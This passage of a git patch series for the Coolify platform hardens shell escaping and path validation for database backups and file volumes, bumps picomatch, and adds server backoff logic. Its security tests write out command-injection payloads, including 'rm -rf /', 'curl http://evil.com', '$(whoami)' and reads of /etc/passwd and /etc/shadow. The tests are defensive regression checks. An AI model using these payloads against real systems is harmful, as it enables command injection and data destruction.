+    $escaped = escapeshellarg($maliciousPassword);
+
+    // The escaped value must be a single shell token that cannot break out
+    expect($escaped)->not->toContain("\n");
+    expect($escaped)->toBe("'\"; rm -rf / #'");
+    // When used in: -e PGPASSWORD=<escaped>, the shell sees one token
+    $command = 'docker exec -e PGPASSWORD='.$escaped.' container pg_dump';
+    expect($command)->toContain("PGPASSWORD='");
+    expect($command)->not->toContain('PGPASSWORD=""');
+});
+
+test('escapeshellarg neutralizes command injection in postgres username', function () {
+    $maliciousUser = 'admin$(whoami)';
+    $escaped = escapeshellarg($maliciousUser);
+
+    expect($escaped)->toBe("'admin\$(whoami)'");
+    $command = "docker exec container pg_dump --username $escaped";
+    // The $() should be inside single quotes, preventing execution
+    expect($command)->toContain("--username 'admin\$(whoami)'");
+});
+
+test('escapeshellarg neutralizes command injection in mysql password', function () {
+    $maliciousPassword = 'pass" && curl http://evil.com #';
+    $escaped = escapeshellarg($maliciousPassword);
+
+    $command = "docker exec container mysqldump -u root -p$escaped db";
+    // The password must be wrapped in single quotes
+    expect($command)->toContain("-p'pass\" && curl http://evil.com #'");
+});
+
+test('escapeshellarg neutralizes command injection in mariadb password', function () {
+    $maliciousPassword = "pass'; whoami; echo '";
+    $escaped = escapeshellarg($maliciousPassword);
+
+    // Single quotes in the value get escaped as '\''
+    expect($escaped)->toBe("'pass'\\'''; whoami; echo '\\'''");
+    $command = "docker exec container mariadb-dump -u root -p$escaped db";
+    // Verify the command doesn't contain an unescaped semicolon outside quotes
+    expect($command)->toContain("-p'pass'");
+});
+
+test('rawurlencode neutralizes shell injection in mongodb URI credentials', function () {
+    $maliciousUser = 'admin";$(whoami)';
+    $maliciousPass = 'pass@evil.com/admin?authSource=admin&rm -rf /';
+
+    $encodedUser = rawurlencode($maliciousUser);
+    $encodedPass = rawurlencode($maliciousPass);
+    $url = "mongodb://{$encodedUser}:{$encodedPass}@container:27017";
+
+    // Special characters should be percent-encoded
+    expect($encodedUser)->not->toContain('"');
+    expect($encodedUser)->not->toContain('$');
+    expect($encodedUser)->not->toContain('(');
+    expect($encodedPass)->not->toContain('@');
+    expect($encodedPass)->not->toContain('/');
+    expect($encodedPass)->not->toContain('?');
+    expect($encodedPass)->not->toContain('&');
+
+    // The URL should have exactly one @ (the delimiter) and the credentials percent-encoded
+    $atCount = substr_count($url, '@');
+    expect($atCount)->toBe(1);
+});
+
+test('escapeshellarg on mongodb URI prevents shell breakout', function () {
+    // Even if internal_db_url contains malicious content, escapeshellarg wraps it safely
+    $maliciousUrl = 'mongodb://admin:pass@host:27017" && curl http://evil.com #';
+    $escaped = escapeshellarg($maliciousUrl);
+
+    $command = "docker exec container mongodump --uri=$escaped --gzip --archive > /backup";
+    // The entire URI must be inside single quotes
+    expect($command)->toContain("--uri='mongodb://admin:pass@host:27017");
+    expect($command)->toContain("evil.com #'");
+    // No unescaped double quotes that could break the command
+    expect(substr_count($command, "'"))->toBeGreaterThanOrEqual(2);
+});

From 3fdce06b654fa3b7b4be59c0faaab6b4546c78de Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 25 Mar 2026 23:44:37 +0100
Subject: [PATCH 144/213] fix(storage): consistent path validation and escaping
 for file volumes
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Ensure all file volume paths are validated and properly escaped before
use. Previously, only directory mount paths were validated at the input
layer — file mount paths now receive the same treatment across Livewire
components, API controllers, and the model layer.

- Validate and escape fs_path at the top of saveStorageOnServer() before
  any commands are built
- Add path validation to submitFileStorage() in Storage Livewire component
- Add path validation to file mount creation in Applications, Services,
  and Databases API controllers
- Add regression tests for path validation coverage

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 .../Api/ApplicationsController.php            | 27 +++++-----
 .../Controllers/Api/DatabasesController.php   | 13 +++--
 .../Controllers/Api/ServicesController.php    |  7 ++-
 app/Livewire/Project/Service/Storage.php      | 13 +++--
 app/Models/LocalFileVolume.php                | 20 +++++---
 tests/Unit/FileStorageSecurityTest.php        | 50 +++++++++++++++++++
 6 files changed, 101 insertions(+), 29 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index 66f6a1ef8..b081069b7 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -1002,7 +1002,7 @@ private function create_application(Request $request, $type)
         $this->authorize('create', Application::class);
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $allowedFields = ['project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'type', 'name', 'description', 'is_static', 'is_spa', 'is_auto_deploy_enabled', 'is_force_https_enabled', 'domains', 'git_repository', 'git_branch', 'git_commit_sha', 'private_key_uuid', 'docker_registry_image_name', 'docker_registry_image_tag', 'build_pack', 'install_command', 'build_command', 'start_command', 'ports_exposes', 'ports_mappings', 'custom_network_aliases', 'base_directory', 'publish_directory', 'health_check_enabled', 'health_check_type', 'health_check_command', 'health_check_path', 'health_check_port', 'health_check_host', 'health_check_method', 'health_check_return_code', 'health_check_scheme', 'health_check_response_text', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'custom_labels', 'custom_docker_run_options', 'post_deployment_command', 'post_deployment_command_container', 'pre_deployment_command', 'pre_deployment_command_container',  'manual_webhook_secret_github', 'manual_webhook_secret_gitlab', 'manual_webhook_secret_bitbucket', 'manual_webhook_secret_gitea', 'redirect', 'github_app_uuid', 'instant_deploy', 'dockerfile', 'dockerfile_location', 'docker_compose_location', 'docker_compose_raw', 'docker_compose_custom_start_command', 'docker_compose_custom_build_command', 'docker_compose_domains', 'watch_paths', 'use_build_server', 'static_image', 'custom_nginx_configuration', 'is_http_basic_auth_enabled', 'http_basic_auth_username', 'http_basic_auth_password', 'connect_to_docker_network', 'force_domain_override', 'autogenerate_domain', 'is_container_label_escape_enabled'];
@@ -1150,7 +1150,7 @@ private function create_application(Request $request, $type)
                 $request->offsetSet('name', generate_application_name($request->git_repository, $request->git_branch));
             }
             $return = $this->validateDataApplications($request, $server);
-            if ($return instanceof \Illuminate\Http\JsonResponse) {
+            if ($return instanceof JsonResponse) {
                 return $return;
             }
 
@@ -1345,7 +1345,7 @@ private function create_application(Request $request, $type)
             }
 
             $return = $this->validateDataApplications($request, $server);
-            if ($return instanceof \Illuminate\Http\JsonResponse) {
+            if ($return instanceof JsonResponse) {
                 return $return;
             }
             $githubApp = GithubApp::whereTeamId($teamId)->where('uuid', $githubAppUuid)->first();
@@ -1573,7 +1573,7 @@ private function create_application(Request $request, $type)
             }
 
             $return = $this->validateDataApplications($request, $server);
-            if ($return instanceof \Illuminate\Http\JsonResponse) {
+            if ($return instanceof JsonResponse) {
                 return $return;
             }
             $privateKey = PrivateKey::whereTeamId($teamId)->where('uuid', $request->private_key_uuid)->first();
@@ -1742,7 +1742,7 @@ private function create_application(Request $request, $type)
             }
 
             $return = $this->validateDataApplications($request, $server);
-            if ($return instanceof \Illuminate\Http\JsonResponse) {
+            if ($return instanceof JsonResponse) {
                 return $return;
             }
             if (! isBase64Encoded($request->dockerfile)) {
@@ -1850,7 +1850,7 @@ private function create_application(Request $request, $type)
                 $request->offsetSet('name', 'docker-image-'.new Cuid2);
             }
             $return = $this->validateDataApplications($request, $server);
-            if ($return instanceof \Illuminate\Http\JsonResponse) {
+            if ($return instanceof JsonResponse) {
                 return $return;
             }
             // Process docker image name and tag using DockerImageParser
@@ -1974,7 +1974,7 @@ private function create_application(Request $request, $type)
                 ], 422);
             }
             $return = $this->validateDataApplications($request, $server);
-            if ($return instanceof \Illuminate\Http\JsonResponse) {
+            if ($return instanceof JsonResponse) {
                 return $return;
             }
             if (! isBase64Encoded($request->docker_compose_raw)) {
@@ -2460,7 +2460,7 @@ public function update_by_uuid(Request $request)
             return invalidTokenResponse();
         }
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -2530,7 +2530,7 @@ public function update_by_uuid(Request $request)
             }
         }
         $return = $this->validateDataApplications($request, $server);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $extraFields = array_diff(array_keys($request->all()), $allowedFields);
@@ -2956,7 +2956,7 @@ public function update_env_by_uuid(Request $request)
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
@@ -3157,7 +3157,7 @@ public function create_bulk_envs(Request $request)
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $application = Application::ownedByCurrentTeamAPI($teamId)->where('uuid', $request->route('uuid'))->first();
@@ -4077,7 +4077,7 @@ public function update_storage(Request $request): JsonResponse
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -4361,6 +4361,9 @@ public function create_storage(Request $request): JsonResponse
             ]);
         } else {
             $mountPath = str($request->mount_path)->trim()->start('/')->value();
+
+            validateShellSafePath($mountPath, 'file storage path');
+
             $fsPath = application_configuration_dir().'/'.$application->uuid.$mountPath;
 
             $storage = LocalFileVolume::create([
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 44b66e57e..f9e171eee 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -334,7 +334,7 @@ public function update_by_uuid(Request $request)
 
         // this check if the request is a valid json
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = customApiValidator($request->all(), [
@@ -685,7 +685,7 @@ public function create_backup(Request $request)
 
         // Validate incoming request is valid JSON
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -914,7 +914,7 @@ public function update_backup(Request $request)
         }
         // this check if the request is a valid json
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validator = customApiValidator($request->all(), [
@@ -1590,7 +1590,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
         $this->authorize('create', StandalonePostgresql::class);
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -3554,6 +3554,9 @@ public function create_storage(Request $request): JsonResponse
             ]);
         } else {
             $mountPath = str($request->mount_path)->trim()->start('/')->value();
+
+            validateShellSafePath($mountPath, 'file storage path');
+
             $fsPath = database_configuration_dir().'/'.$database->uuid.$mountPath;
 
             $storage = LocalFileVolume::create([
@@ -3646,7 +3649,7 @@ public function update_storage(Request $request): JsonResponse
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index ca565ece0..89635875c 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -302,7 +302,7 @@ public function create_service(Request $request)
         $this->authorize('create', Service::class);
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
         $validationRules = [
@@ -925,7 +925,7 @@ public function update_by_uuid(Request $request)
         }
 
         $return = validateIncomingRequest($request);
-        if ($return instanceof \Illuminate\Http\JsonResponse) {
+        if ($return instanceof JsonResponse) {
             return $return;
         }
 
@@ -2110,6 +2110,9 @@ public function create_storage(Request $request): JsonResponse
             ]);
         } else {
             $mountPath = str($request->mount_path)->trim()->start('/')->value();
+
+            validateShellSafePath($mountPath, 'file storage path');
+
             $fsPath = service_configuration_dir().'/'.$service->uuid.$mountPath;
 
             $storage = LocalFileVolume::create([
diff --git a/app/Livewire/Project/Service/Storage.php b/app/Livewire/Project/Service/Storage.php
index 12d8bcbc3..e896f060a 100644
--- a/app/Livewire/Project/Service/Storage.php
+++ b/app/Livewire/Project/Service/Storage.php
@@ -2,6 +2,8 @@
 
 namespace App\Livewire\Project\Service;
 
+use App\Models\Application;
+use App\Models\LocalFileVolume;
 use App\Models\LocalPersistentVolume;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
@@ -49,7 +51,7 @@ public function mount()
             $this->file_storage_directory_source = application_configuration_dir()."/{$this->resource->uuid}";
         }
 
-        if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+        if ($this->resource->getMorphClass() === Application::class) {
             if ($this->resource->destination->server->isSwarm()) {
                 $this->isSwarm = true;
             }
@@ -138,7 +140,10 @@ public function submitFileStorage()
             $this->file_storage_path = trim($this->file_storage_path);
             $this->file_storage_path = str($this->file_storage_path)->start('/')->value();
 
-            if ($this->resource->getMorphClass() === \App\Models\Application::class) {
+            // Validate path to prevent command injection
+            validateShellSafePath($this->file_storage_path, 'file storage path');
+
+            if ($this->resource->getMorphClass() === Application::class) {
                 $fs_path = application_configuration_dir().'/'.$this->resource->uuid.$this->file_storage_path;
             } elseif (str($this->resource->getMorphClass())->contains('Standalone')) {
                 $fs_path = database_configuration_dir().'/'.$this->resource->uuid.$this->file_storage_path;
@@ -146,7 +151,7 @@ public function submitFileStorage()
                 throw new \Exception('No valid resource type for file mount storage type!');
             }
 
-            \App\Models\LocalFileVolume::create([
+            LocalFileVolume::create([
                 'fs_path' => $fs_path,
                 'mount_path' => $this->file_storage_path,
                 'content' => $this->file_storage_content,
@@ -183,7 +188,7 @@ public function submitFileStorageDirectory()
             validateShellSafePath($this->file_storage_directory_source, 'storage source path');
             validateShellSafePath($this->file_storage_directory_destination, 'storage destination path');
 
-            \App\Models\LocalFileVolume::create([
+            LocalFileVolume::create([
                 'fs_path' => $this->file_storage_directory_source,
                 'mount_path' => $this->file_storage_directory_destination,
                 'is_directory' => true,
diff --git a/app/Models/LocalFileVolume.php b/app/Models/LocalFileVolume.php
index da58ed2f9..b954a1dd5 100644
--- a/app/Models/LocalFileVolume.php
+++ b/app/Models/LocalFileVolume.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Events\FileStorageChanged;
+use App\Jobs\ServerStorageSaveJob;
 use Illuminate\Database\Eloquent\Casts\Attribute;
 use Illuminate\Database\Eloquent\Factories\HasFactory;
 use Symfony\Component\Yaml\Yaml;
@@ -27,7 +28,7 @@ protected static function booted()
     {
         static::created(function (LocalFileVolume $fileVolume) {
             $fileVolume->load(['service']);
-            dispatch(new \App\Jobs\ServerStorageSaveJob($fileVolume));
+            dispatch(new ServerStorageSaveJob($fileVolume));
         });
     }
 
@@ -129,15 +130,22 @@ public function saveStorageOnServer()
             $server = $this->resource->destination->server;
         }
         $commands = collect([]);
+
+        // Validate fs_path early before any shell interpolation
+        validateShellSafePath($this->fs_path, 'storage path');
+        $escapedFsPath = escapeshellarg($this->fs_path);
+        $escapedWorkdir = escapeshellarg($workdir);
+
         if ($this->is_directory) {
-            $commands->push("mkdir -p $this->fs_path > /dev/null 2>&1 || true");
-            $commands->push("mkdir -p $workdir > /dev/null 2>&1 || true");
-            $commands->push("cd $workdir");
+            $commands->push("mkdir -p {$escapedFsPath} > /dev/null 2>&1 || true");
+            $commands->push("mkdir -p {$escapedWorkdir} > /dev/null 2>&1 || true");
+            $commands->push("cd {$escapedWorkdir}");
         }
         if (str($this->fs_path)->startsWith('.') || str($this->fs_path)->startsWith('/') || str($this->fs_path)->startsWith('~')) {
             $parent_dir = str($this->fs_path)->beforeLast('/');
             if ($parent_dir != '') {
-                $commands->push("mkdir -p $parent_dir > /dev/null 2>&1 || true");
+                $escapedParentDir = escapeshellarg($parent_dir);
+                $commands->push("mkdir -p {$escapedParentDir} > /dev/null 2>&1 || true");
             }
         }
         $path = data_get_str($this, 'fs_path');
@@ -147,7 +155,7 @@ public function saveStorageOnServer()
             $path = $workdir.$path;
         }
 
-        // Validate and escape path to prevent command injection
+        // Validate and escape resolved path (may differ from fs_path if relative)
         validateShellSafePath($path, 'storage path');
         $escapedPath = escapeshellarg($path);
 
diff --git a/tests/Unit/FileStorageSecurityTest.php b/tests/Unit/FileStorageSecurityTest.php
index a89a209b1..192ea8c8f 100644
--- a/tests/Unit/FileStorageSecurityTest.php
+++ b/tests/Unit/FileStorageSecurityTest.php
@@ -91,3 +91,53 @@
     expect(fn () => validateShellSafePath('/tmp/upload_dir-2024', 'storage path'))
         ->not->toThrow(Exception::class);
 });
+
+// --- Regression tests for GHSA-46hp-7m8g-7622 ---
+// These verify that file mount paths (not just directory mounts) are validated,
+// and that saveStorageOnServer() validates fs_path before any shell interpolation.
+
+test('file storage rejects command injection in file mount path context', function () {
+    $maliciousPaths = [
+        '/app/config$(id)',
+        '/app/config;whoami',
+        '/app/config|cat /etc/passwd',
+        '/app/config`id`',
+        '/app/config&whoami',
+        '/app/config>/tmp/pwned',
+        '/app/config</etc/shadow',
+        "/app/config\nrm -rf /",
+    ];
+
+    foreach ($maliciousPaths as $path) {
+        expect(fn () => validateShellSafePath($path, 'file storage path'))
+            ->toThrow(Exception::class);
+    }
+});
+
+test('file storage rejects variable substitution in paths', function () {
+    expect(fn () => validateShellSafePath('/data/${IFS}cat${IFS}/etc/passwd', 'file storage path'))
+        ->toThrow(Exception::class);
+});
+
+test('file storage accepts safe file mount paths', function () {
+    $safePaths = [
+        '/etc/nginx/nginx.conf',
+        '/app/.env',
+        '/data/coolify/services/abc123/config.yml',
+        '/var/www/html/index.php',
+        '/opt/app/config/database.json',
+    ];
+
+    foreach ($safePaths as $path) {
+        expect(fn () => validateShellSafePath($path, 'file storage path'))
+            ->not->toThrow(Exception::class);
+    }
+});
+
+test('file storage accepts relative dot-prefixed paths', function () {
+    expect(fn () => validateShellSafePath('./config/app.yaml', 'storage path'))
+        ->not->toThrow(Exception::class);
+
+    expect(fn () => validateShellSafePath('./data', 'storage path'))
+        ->not->toThrow(Exception::class);
+});

From b22e470877129ce4a787c0fa639a00999faac17c Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 26 Mar 2026 00:53:57 +0000
Subject: [PATCH 145/213] chore(deps): bump picomatch

Bumps  and [picomatch](https://github.com/micromatch/picomatch). These dependencies needed to be updated together.

Updates `picomatch` from 4.0.3 to 4.0.4
- [Release notes](https://github.com/micromatch/picomatch/releases)
- [Changelog](https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md)
- [Commits](https://github.com/micromatch/picomatch/compare/4.0.3...4.0.4)

Updates `picomatch` from 2.3.1 to 2.3.2
- [Release notes](https://github.com/micromatch/picomatch/releases)
- [Changelog](https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md)
- [Commits](https://github.com/micromatch/picomatch/compare/4.0.3...4.0.4)

---
updated-dependencies:
- dependency-name: picomatch
  dependency-version: 4.0.4
  dependency-type: indirect
- dependency-name: picomatch
  dependency-version: 2.3.2
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
---
 package-lock.json | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/package-lock.json b/package-lock.json
index 3c9753bb8..6959704a1 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -2388,9 +2388,9 @@
             "license": "ISC"
         },
         "node_modules/picomatch": {
-            "version": "4.0.3",
-            "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.3.tgz",
-            "integrity": "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==",
+            "version": "4.0.4",
+            "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz",
+            "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
             "dev": true,
             "license": "MIT",
             "engines": {
@@ -2795,9 +2795,9 @@
             }
         },
         "node_modules/vite-plugin-full-reload/node_modules/picomatch": {
-            "version": "2.3.1",
-            "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
-            "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
+            "version": "2.3.2",
+            "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
+            "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
             "dev": true,
             "license": "MIT",
             "engines": {

From dd2c9c291aaed35c026650bbd2028c35513360c5 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 10:51:36 +0100
Subject: [PATCH 146/213] feat(jobs): implement exponential backoff for
 unreachable servers

Reduce load on unreachable servers by implementing exponential backoff
during connectivity failures. Check frequency decreases based on
consecutive failure count:
  0-2: every cycle
  3-5: ~15 min intervals
  6-11: ~30 min intervals
  12+: ~60 min intervals

Uses server ID hash to distribute checks across cycles and prevent
thundering herd.

ServerCheckJob and ServerConnectionCheckJob increment unreachable_count
on failures. ServerManagerJob applies backoff logic before dispatching
checks. Includes comprehensive test coverage.
---
 app/Jobs/ServerCheckJob.php           |   4 +-
 app/Jobs/ServerConnectionCheckJob.php |  38 ++++--
 app/Jobs/ServerManagerJob.php         |  42 ++++++-
 tests/Unit/ServerBackoffTest.php      | 175 ++++++++++++++++++++++++++
 4 files changed, 245 insertions(+), 14 deletions(-)
 create mode 100644 tests/Unit/ServerBackoffTest.php

diff --git a/app/Jobs/ServerCheckJob.php b/app/Jobs/ServerCheckJob.php
index a18d45b9a..10faa7e9b 100644
--- a/app/Jobs/ServerCheckJob.php
+++ b/app/Jobs/ServerCheckJob.php
@@ -15,6 +15,7 @@
 use Illuminate\Queue\InteractsWithQueue;
 use Illuminate\Queue\Middleware\WithoutOverlapping;
 use Illuminate\Queue\SerializesModels;
+use Illuminate\Queue\TimeoutExceededException;
 use Illuminate\Support\Facades\Log;
 
 class ServerCheckJob implements ShouldBeEncrypted, ShouldQueue
@@ -36,11 +37,12 @@ public function __construct(public Server $server) {}
 
     public function failed(?\Throwable $exception): void
     {
-        if ($exception instanceof \Illuminate\Queue\TimeoutExceededException) {
+        if ($exception instanceof TimeoutExceededException) {
             Log::warning('ServerCheckJob timed out', [
                 'server_id' => $this->server->id,
                 'server_name' => $this->server->name,
             ]);
+            $this->server->increment('unreachable_count');
 
             // Delete the queue job so it doesn't appear in Horizon's failed list.
             $this->job?->delete();
diff --git a/app/Jobs/ServerConnectionCheckJob.php b/app/Jobs/ServerConnectionCheckJob.php
index 2c73ae43e..7ce316dcd 100644
--- a/app/Jobs/ServerConnectionCheckJob.php
+++ b/app/Jobs/ServerConnectionCheckJob.php
@@ -2,8 +2,10 @@
 
 namespace App\Jobs;
 
+use App\Helpers\SshMultiplexingHelper;
 use App\Models\Server;
 use App\Services\ConfigurationRepository;
+use App\Services\HetznerService;
 use Illuminate\Bus\Queueable;
 use Illuminate\Contracts\Queue\ShouldBeEncrypted;
 use Illuminate\Contracts\Queue\ShouldQueue;
@@ -11,7 +13,9 @@
 use Illuminate\Queue\InteractsWithQueue;
 use Illuminate\Queue\Middleware\WithoutOverlapping;
 use Illuminate\Queue\SerializesModels;
+use Illuminate\Queue\TimeoutExceededException;
 use Illuminate\Support\Facades\Log;
+use Illuminate\Support\Facades\Process;
 
 class ServerConnectionCheckJob implements ShouldBeEncrypted, ShouldQueue
 {
@@ -19,7 +23,7 @@ class ServerConnectionCheckJob implements ShouldBeEncrypted, ShouldQueue
 
     public $tries = 1;
 
-    public $timeout = 30;
+    public $timeout = 15;
 
     public function __construct(
         public Server $server,
@@ -28,7 +32,7 @@ public function __construct(
 
     public function middleware(): array
     {
-        return [(new WithoutOverlapping('server-connection-check-'.$this->server->uuid))->expireAfter(45)->dontRelease()];
+        return [(new WithoutOverlapping('server-connection-check-'.$this->server->uuid))->expireAfter(25)->dontRelease()];
     }
 
     private function disableSshMux(): void
@@ -72,6 +76,7 @@ public function handle()
                     'is_reachable' => false,
                     'is_usable' => false,
                 ]);
+                $this->server->increment('unreachable_count');
 
                 Log::warning('ServerConnectionCheck: Server not reachable', [
                     'server_id' => $this->server->id,
@@ -90,6 +95,10 @@ public function handle()
                 'is_usable' => $isUsable,
             ]);
 
+            if ($this->server->unreachable_count > 0) {
+                $this->server->update(['unreachable_count' => 0]);
+            }
+
         } catch (\Throwable $e) {
 
             Log::error('ServerConnectionCheckJob failed', [
@@ -100,6 +109,7 @@ public function handle()
                 'is_reachable' => false,
                 'is_usable' => false,
             ]);
+            $this->server->increment('unreachable_count');
 
             return;
         }
@@ -107,11 +117,12 @@ public function handle()
 
     public function failed(?\Throwable $exception): void
     {
-        if ($exception instanceof \Illuminate\Queue\TimeoutExceededException) {
+        if ($exception instanceof TimeoutExceededException) {
             $this->server->settings->update([
                 'is_reachable' => false,
                 'is_usable' => false,
             ]);
+            $this->server->increment('unreachable_count');
 
             // Delete the queue job so it doesn't appear in Horizon's failed list.
             $this->job?->delete();
@@ -123,7 +134,7 @@ private function checkHetznerStatus(): void
         $status = null;
 
         try {
-            $hetznerService = new \App\Services\HetznerService($this->server->cloudProviderToken->token);
+            $hetznerService = new HetznerService($this->server->cloudProviderToken->token);
             $serverData = $hetznerService->getServer($this->server->hetzner_server_id);
             $status = $serverData['status'] ?? null;
 
@@ -144,15 +155,18 @@ private function checkHetznerStatus(): void
     private function checkConnection(): bool
     {
         try {
-            // Use instant_remote_process with a simple command
-            // This will automatically handle mux, sudo, IPv6, Cloudflare tunnel, etc.
-            $output = instant_remote_process_with_timeout(
-                ['ls -la /'],
-                $this->server,
-                false // don't throw error
-            );
+            // Single SSH attempt without SshRetryHandler — retries waste time for connectivity checks.
+            // Backoff is managed at the dispatch level via unreachable_count.
+            $commands = ['ls -la /'];
+            if ($this->server->isNonRoot()) {
+                $commands = parseCommandsByLineForSudo(collect($commands), $this->server);
+            }
+            $commandString = implode("\n", $commands);
 
-            return $output !== null;
+            $sshCommand = SshMultiplexingHelper::generateSshCommand($this->server, $commandString, true);
+            $process = Process::timeout(10)->run($sshCommand);
+
+            return $process->exitCode() === 0;
         } catch (\Throwable $e) {
             Log::debug('ServerConnectionCheck: Connection check failed', [
                 'server_id' => $this->server->id,
diff --git a/app/Jobs/ServerManagerJob.php b/app/Jobs/ServerManagerJob.php
index 3f748f0ca..9532282cc 100644
--- a/app/Jobs/ServerManagerJob.php
+++ b/app/Jobs/ServerManagerJob.php
@@ -86,6 +86,9 @@ private function dispatchConnectionChecks(Collection $servers): void
                     if ($server->isSentinelEnabled() && $server->isSentinelLive()) {
                         return;
                     }
+                    if ($this->shouldSkipDueToBackoff($server)) {
+                        return;
+                    }
                     ServerConnectionCheckJob::dispatch($server);
                 } catch (\Exception $e) {
                     Log::channel('scheduled-errors')->error('Failed to dispatch ServerConnectionCheck', [
@@ -129,7 +132,9 @@ private function processServerTasks(Server $server): void
         if ($sentinelOutOfSync) {
             // Dispatch ServerCheckJob if Sentinel is out of sync
             if (shouldRunCronNow($this->checkFrequency, $serverTimezone, "server-check:{$server->id}", $this->executionTime)) {
-                ServerCheckJob::dispatch($server);
+                if (! $this->shouldSkipDueToBackoff($server)) {
+                    ServerCheckJob::dispatch($server);
+                }
             }
         }
 
@@ -165,4 +170,39 @@ private function processServerTasks(Server $server): void
         // Note: CheckAndStartSentinelJob is only dispatched daily (line above) for version updates.
         // Crash recovery is handled by sentinelOutOfSync → ServerCheckJob → CheckAndStartSentinelJob.
     }
+
+    /**
+     * Determine the backoff cycle interval based on how many consecutive times a server has been unreachable.
+     * Higher counts → less frequent checks (based on 5-min cloud cycle):
+     *   0-2: every cycle, 3-5: ~15 min, 6-11: ~30 min, 12+: ~60 min
+     */
+    private function getBackoffCycleInterval(int $unreachableCount): int
+    {
+        return match (true) {
+            $unreachableCount <= 2 => 1,
+            $unreachableCount <= 5 => 3,
+            $unreachableCount <= 11 => 6,
+            default => 12,
+        };
+    }
+
+    /**
+     * Check if a server should be skipped this cycle due to unreachable backoff.
+     * Uses server ID hash to distribute checks across cycles (avoid thundering herd).
+     */
+    private function shouldSkipDueToBackoff(Server $server): bool
+    {
+        $unreachableCount = $server->unreachable_count ?? 0;
+        $interval = $this->getBackoffCycleInterval($unreachableCount);
+
+        if ($interval <= 1) {
+            return false;
+        }
+
+        $cyclePeriodMinutes = isCloud() ? 5 : 1;
+        $cycleIndex = intdiv($this->executionTime->minute, $cyclePeriodMinutes);
+        $serverHash = abs(crc32((string) $server->id));
+
